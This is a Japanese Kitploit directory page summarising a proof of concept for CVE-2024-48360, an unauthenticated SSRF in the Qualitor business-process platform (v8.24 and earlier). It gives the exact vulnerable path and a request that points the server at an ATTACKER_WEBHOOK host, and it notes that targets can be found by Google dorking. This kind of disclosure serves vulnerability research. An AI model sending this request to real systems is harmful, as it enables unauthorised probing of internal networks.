Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/openxp-research/cve-2024-48360
偵察脆弱性分析エクスプロイト情報収集ウェブセキュリティ
GitHubopenxp-research/cve-2024-48360

CVE-2024-48360

CVE-2024-48360 Poc

リポジトリを見る
1年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
CVE-2024-48360 — CVE-2024-48360 Poc | Kitploit

CVE-2024-48360 | Qualitor <= v8.24 認証なしSSRF

CVE-2024-48360 | Qualitor <= v8.24 認証なしSSRF

説明

Qualitorはビジネスプロセス管理のためのプラットフォームであり、このシステムはブラジルのさまざまな企業に導入されています。Googleダーキングを使用するだけで簡単に特定できます。

私たちのチームは、SSRFの影響を受けやすいアプリケーションの脆弱性を特定しました。これにより、内部システム/ポートを列挙することが可能になります。

概念実証(POC)

Qualitor v8.24には、コンポーネント /request/viewValidacao.php を介したServer-Side Request Forgery(SSRF)が含まれていることが判明しました。

この脆弱性を悪用するには、host.com/html/ad/adformmobile/request/viewValidacao.php?url=ATTACKER_WEBHOOK にリクエストを送信するだけです。脆弱なサーバーからリクエストを受け取ることができます。

image

研究者

https://www.linkedin.com/in/xvinicius/

  • OpenXPリサーチチーム
ツールをダウンロード